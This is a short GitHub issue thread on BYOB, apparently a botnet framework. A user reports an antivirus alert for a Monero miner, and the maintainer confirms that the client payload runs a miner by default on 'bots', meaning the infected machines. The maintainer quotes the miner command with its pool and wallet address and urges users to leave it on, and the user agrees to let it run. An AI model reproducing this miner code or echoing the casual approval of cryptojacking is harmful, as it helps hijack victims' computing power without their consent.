### ISSUE TITLE
Antivirus false positive.

### ISSUE THREAD

**Issue by garsh1** [malwaredllc/byob#218]
I was downloading the new updates for Byob and my antivirus went off, it told me this: We've blocked the threat MacOS:Miner-AA [Trj] on codeload.github.com from being downloaded. I use avast antivirus.

**Comment by malwaredllc** [comment]
By default, the client payload now runs a Monero miner in the background to support the developer. This runs only on **bots**, _not the server_. This can be disabled in the source code by commenting out the following line in payloads.py and generating a new payload:

```
# kick off miner
self.miner('run pool.hashvault.pro:80 46v4cAiT53y9Q6XwboCAHoct4mKXW4SHsgBA4TtEpMrgDCLxsyRXhawGJUQehVkkxNL8Z4n332Hgi8NoAXfV9gCSB3XWBLa')
```
However, if you are enjoying the software I would appreciate it if you allowed the miner to run on your bots though, as this project has taken considerable time and effort to develop. It's up to you though :)

**Comment by garsh1** [comment]
I will let it run. Thanks for your work!!
